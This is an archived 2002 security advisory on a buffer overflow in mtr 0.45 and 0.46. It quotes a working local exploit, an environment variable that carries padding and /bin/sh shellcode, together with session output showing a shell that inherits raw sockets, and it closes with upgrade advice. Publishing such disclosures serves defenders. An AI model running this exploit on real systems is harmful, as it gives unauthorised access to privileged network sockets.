7th Mar 2002 [SBWID-5168]
COMMAND
mtr buffer overflow
SYSTEMS AFFECTED
mtr 0.45, 0.46
PROBLEM
Przemyslaw Frasunek [http://www.frasunek.com/] says :
The sample exploit is TRIVIAL because of strtok/while loop in
vulnerable code.
clitoris:/home/venglin/mtr-0.45> uname -smr
Linux 2.4.8-26mdk i686
clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e \'print \"A \"x130 . \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\"\'`
clitoris:/home/venglin/mtr-0.45> ./mtr
sh-2.05$
At this point, exec\'d shell has a raw socket opened:
clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07
sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400]
lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401]
lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd
SOLUTION
Upgrade to latest patch level (as of 07 March 2002)
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
